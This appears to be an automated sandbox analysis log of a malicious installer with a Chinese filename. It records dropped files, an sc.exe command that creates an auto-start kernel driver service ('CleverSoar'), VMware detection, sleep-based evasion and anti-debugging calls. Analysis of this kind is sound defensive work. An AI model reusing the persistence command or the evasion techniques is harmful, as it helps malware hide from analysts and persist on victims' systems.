Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5147Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4572Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow / User API: threadDelayed 569Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow / User API: threadDelayed 536Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow / User API: threadDelayed 506Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-7F262.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep count: 5147 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep count: 4572 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA598B0 FindFirstFileA,FindClose,6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00387496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00389C60 GetSystemInfo,10_2_00389C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CA6EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_004057D0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6DF9D mov eax, dword ptr fs:[00000030h]6_2_6CA6DF9D
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA78B86 mov eax, dword ptr fs:[00000030h]6_2_6CA78B86
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA78B55 mov eax, dword ptr fs:[00000030h]6_2_6CA78B55
